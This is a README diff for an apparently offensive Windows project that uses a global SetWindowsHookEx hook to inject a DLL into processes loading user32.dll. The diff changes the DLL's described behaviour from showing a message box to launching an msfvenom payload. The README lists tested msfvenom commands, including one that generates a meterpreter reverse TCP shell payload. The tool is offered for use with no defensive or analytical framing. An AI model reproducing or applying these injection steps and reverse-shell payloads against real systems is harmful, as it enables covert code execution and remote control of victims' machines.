Msfv3n0m/Global-SetWindowsHookEx-Injector/README.md

 # Global-SetWindowsHookEx-Injector
-main.cpp: Loads test.dll into a subset of processes that have user32.dll loaded </br> dllmain.cpp: Launches a thread that spawns a messagebox whenever it is loaded </br>
+main.cpp: Loads test.dll into a subset of processes that have user32.dll loaded </br> dllmain.cpp: Launches a thread that launches an msfvenom payload whenever it is loaded </br>
 ## Payloads that have been tested with this project
 `msfvenom -f c -p windows/x64/messagebox EXITFUNC=thread TEXT="Hello, from urmom"` </br>
 `msfvenom -p windows/x64/meterpreter_reverse_tcp EXITFUNC=thread RHOST=127.0.0.1 RPORT=4444 -f c -o file.txt`